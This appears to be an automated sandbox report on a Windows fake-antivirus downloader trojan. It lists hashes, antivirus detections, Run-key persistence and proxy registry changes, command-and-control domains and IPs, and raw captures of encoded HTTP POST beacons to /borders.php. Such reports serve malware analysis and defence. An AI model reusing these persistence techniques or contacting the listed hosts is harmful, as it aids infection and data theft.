Analysis Date2015-01-17 21:19:13
MD5c55e2707dc51ccb8bbf52b7a437530a5
SHA159478089d47b034b658c815092cf48ff7de4b3e3

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 657e198738285cc73ab7d44351077f36 sha1: e86b4fd28b3834342f117205db611a4cd52d5525 size: 6656
Section.data md5: 3b314334213da0ac96ca5f2af88b23a1 sha1: b22819ca5e3c183b4c224747f335d1476acee74b size: 12288
Section.bss md5: 05ea70efaebf11603fb4528cfde6f567 sha1: 270c6516ab476ae35bca1b4c9da57c35bc041fa1 size: 109568
Section.idata md5: 4c4287e716f068a85c470bf7efc329c7 sha1: 3cf81d0f13804e68e5a6cd28af66c5ee11f8e9b9 size: 4608
Section.rsrc md5: b938ed6cf62f2f50bd7fdf62c52ecc61 sha1: bc24a2f666f6735755c84057bc728ce20159708f size: 4096
Timestamp2009-07-06 04:05:26
VersionLegalCopyright: Copyright © 2010 PC Tools. All rights reserved. d
InternalName: 4JmagL8D.exe
FileVersion: 7.0.0.61
CompanyName: videosoft
LegalTrademarks:
Comments:
ProductName: OG ES
ProductVersion: 7.0.0.61
FileDescription: PwVideo Componentg
OriginalFilename: 4JmagL8D.exe
PackerBorland Delphi 4.0
PEhash84ccaf6caf3dbf271493d9248b059fe99bb6b51c
IMPhash64d30ceaf4341462ae370bfc9e968073
AV360 Safeno_virus
AVAd-AwareGen:Variant.Kazy.20920
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Gen:Variant.Kazy.20920
AVAuthentiumW32/FakeAlert.KN.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen2
AVBullGuardGen:Variant.Kazy.20920
AVCA (E-Trust Ino)Win32/Renos.D!generic
AVCAT (quickheal)Trojan.Renos.LN
AVClamAVTrojan.Jorik-152
AVDr. WebTrojan.DownLoader2.44261
AVEmsisoftGen:Variant.Kazy.20920
AVEset (nod32)Win32/Kryptik.NCQ
AVFortinetW32/Diple.IZ!tr
AVFrisk (f-prot)W32/FakeAlert.KN.gen!Eldorado
AVF-SecureGen:Variant.Kazy.20920
AVGrisoft (avg)Generic22.WHV
AVIkarusTrojan.SuspectCRC
AVK7Trojan ( 0024c1841 )
AVKasperskyWorm.Win32.Skor.z
AVMalwareBytesTrojan.Downloader
AVMcafeeDownloader-CEW.ap
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.PT
AVMicroWorld (escan)Gen:Variant.Kazy.20920
AVRisingTrojan.Win32.Generic.12867422
AVSophosMal/FakeAV-IZ
AVSymantecTrojan.FakeAV
AVTrend MicroTROJ_AGENT.SMAH
AVVirusBlokAda (vba32)Heur.Trojan.Hlux

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GHWAUC6NNZ ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\GHWAUC6NNZ\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS30.157.231.171
Winsock DNSfrancisawe.com
Winsock DNSspanishser.com

Network Details:

DNSwebcache.foreign.ccgslb.com
Type: A
58.68.168.250
DNSwebcache.foreign.ccgslb.com
Type: A
65.255.44.2
DNSwebcache.foreign.ccgslb.com
Type: A
209.177.90.10
DNSwebcache.foreign.ccgslb.com
Type: A
209.177.92.6
DNS58.com
Type: A
211.151.111.30
DNShatena.ne.jp
Type: A
59.106.194.19
DNSfrancisawe.com
Type: A
192.64.178.149
DNSdergeneral.com
Type: A
54.209.61.132
DNSpeople.com.cn
Type: A
DNSspanishser.com
Type: A
DNSvawsofort.com
Type: A
HTTP POSThttp://francisawe.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://30.157.231.171/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 192.64.178.149:80
Flows TCP192.168.1.1:1032 ➝ 30.157.231.171:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6672616e 63697361 77652e63 6f6d0d0a   francisawe.com..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 30704537 6b4f4870 37655263   VCC/0pE7kOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49365a67 366e3336 642f3334   nrnlI6Zg6n36d/34
0x00000240 (00576)   6b6f4656 78627151 6a2b673d 3d         koFVxbqQj+g==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   33302e31 35372e32 33312e31 37310d0a   30.157.231.171..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 30704537 6b4f4870 37655263   VCC/0pE7kOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49365a67 366e3336 642f3334   nrnlI6Zg6n36d/34
0x00000240 (00576)   6b6f4656 78627151 6a2b673d 3d         koFVxbqQj+g==


Strings
{.3..
Bb..
.b.
..
.....
e..7M
..
040904E4
 2010  PC Tools.  All rights reserved. d
4JmagL8D.exe
7.0.0.61
&About
BBABORT
BBALL
BBCANCEL
Comments
CompanyName
Copyright 
E&xit
f8q4
&File
FileDescription
FileVersion
InternalName
LegalCopyright
LegalTrademarks
MAINMENU(
OG ES
oiPD
&Open
OriginalFilename
ProductName
ProductVersion
PwVideo Componentg
qgkr
SFD8
StringFileInfo
Translation
VarFileInfo
videosoft
VS_VERSION_INFO
0HF$-j
[0LS^'
13d|XB
1]n'7C
1Q!5K[
1Tn+ L
_2tI9mJKsVsV@8
2.YVSgE
:33:"$
"*"$33
3333:"$
333333
3333333
$3333333
33333333
33333333?333333
333333333333333333
3333333333333338
333333:"33333338
33333:"$3333338
3333339
333338
33333833
#33338
:*"*"$3338
333838
334C33333338
33B$3333333
34""C33333833
3)6{Fd
3B""$33333
`+3jMQR
"3(~sU
^3Vlup+Q;
4"*""C3338
__4Fkb@8
4$img$aM_
4iSrT(
4JmagL8D.exe
4K3P7I
4y`;O[=J
5esTUl
_5mp4QT76dv6I@8
5RhCf{
_6t">;
`}:6WGp8"
}7HW{\
\=7XE:
8`"^	:
8bh3IF
8CA7{2
_8yltIGvIZgG4@24
9toVmI
a95L`x
A,9C#4
,AddX_
Af58k^
ahy&%|
an6rWnHk
  </application> 
  <application> 
@AQTP!
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows - Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
=\BbOd
BeginPaint
b{#^GVW
Bq!)dT
BY3P}F
"C3338
c3CEQud@20
C59s,Q
"C8338
CallNextHookEx
calloc
CallWindowProcA
CharLowerBuffA
CheckMenuItem
CLCIoi&
ClientToScreen
CompareStringA
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CreateFileA
$D&$@;
D554wt
`.data
DefFrameProcA
_dEMZ_jk
DestroyIcon
DestroyMenu
dG-s}q
DispatchMessageA
D?$mf@
DrawEdge
DrawFrameControl
DrawMenuBar
DrawTextA
d@sG4g
],d]_u
_DVt6QqGVU@4
D(+Y?g
-egV"o
ELi3lQo
EnableMenuItem
Et;F\}U
@eX-ed`
ExitProcess
ExitThread
*fa1m]Rbh
flTZ4A=
]{fM8Lo
fPAxQl^
f?SfO@l
#G9'76
GetActiveWindow
GetClassLongA
GetClassNameA
GetClientRect
GetCurrentThread
GetCursorPos
GetKeyboardLayoutList
GetKeyboardState
GetKeyNameTextA
GetLastError
GetMenu
GetMenuState
GetModuleHandleA
GetStdHandle
GetStringTypeW
GetSysColor
GetSystemMenu
GetTickC
GetTopWindow
GetUserDefaultLCID
GetWindow
gHuK4y$A
GlobalAddAtomA
GlobalDeleteAtom
GnuM66
g=*S=W
G/u):I3
*g:W~Q<
G+x}\p}
g _Yy6n
HeapAlloc
HeapDestroy
HeapFree
<H<FR76@
h%HKVS
*\}h@+M
HPdhvsnuuP
H&sfS?q
H wGt$
hwQeFj
hXMV{gu
ibmR65iV8eF0d
@.idata
InsertMenuItemA
IntersectRect
InvalidateRect
#irPsG
IsChild
IsDialogMessageW
IsDlgButtonChecked
,i^Se3
IsMenu
IsWindowUnicode
IsWindowVisible
IsZoomed
IW3c4G
J_1_>EtS
"J333333
%J6	L~
J	83 ~,
"J"C3333
__jhvKXZ@24
jpxup}kM
[jrzuf
>k}8lU
.#K+e|
KERNEL32.DLL
KillTimer
K\T`~'
 L1~yC
le8fM^P
LoadCursorA
LoadIconA
LoadLibraryA
LoadLibraryExA
LoadResource
LocalReAlloc
l##P6j&
lstrcatA
lstrlenW
&M`%8W
main.cpl
MapWindowPoints
=#McaqY
memcpy
memset
MessageBeep
MgSQUh
m{HSDW?
m\J[2 3
msR9lR
msvcrt.dll
~M=ud(
n*~lU.
NnE=Xb5
nO+ZV .!
%_Nq!8(
NVFzM,
NWHyALW
=>o&gaAf
ogmJsM
OLEAUTu
o}>N/'
OpenClipboard
OpenIcon
O-(QP{K
_ORHmj
{OY9XD
+P@=4>
p!6[^4
p`aocn
pDeNghHf0
P/E9^\~
PeekMessageW
PI#H<w4
PKocjs
PostMessageA
_PPOnuQN
PR^0+N
PtInRect
PzA,->
()q40Xi
qxBz2VYFN
&QxwM{
~@QZ^&L
r+A1yjOz
,Rd0Ws
RedrawWindow
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
rjfz0*69
@.rsrc
ScreenToClient
      </security>
      <security>
SetActiveWindow
SetClipboardData
SetCursor
SetForegroundWindow
SetScrollPos
SetTimer
SetWindowPlacement
SetWindowPos
ShowScrollBar
SizeofResource
,(SP'm
sprintf
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
SystemParametersInfoA
%^t-Eu5
tf<>SD
T) G*\
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
-Tlt;q
ToWHgVh
t$/\+q
T]qUYO
tr9FvmS
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
T}.WV)
}TWW*M
t	zhyU
tZT(N|
.&u<7&
[uGR6(
uh85K7
uLaFPG
+ULi=7uu
uMYGJf
u:n_Y:
USER32.DLL
`V^\B[Q]
 VF!5WE#1
@VfXAH\
v;HvBSN
VirtualAllocEx
;ViXU+L
	Vp*LW
/v`qkPA|
V&Vfwt
w`+6j@
W8-@%^
wcschr
wcsncmp
wcstol
WiJhZ2Z
w-MjQ.
?W*pphR"q
w"RBVSu{
wsprintfA
^X2%IS
XlbEUp
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
x;Oqu9
^:X+xM*
Xykaz'r
y(f\oD
Yk6S04{
\Yk]e\
Yog3 |
~<*,YY5+
Y>(Y7#
Zd[+e?
%zgKv 
Zk!+{0QU
]zR})[
ZV]^$!
zx)e@V
Z[y(}SHi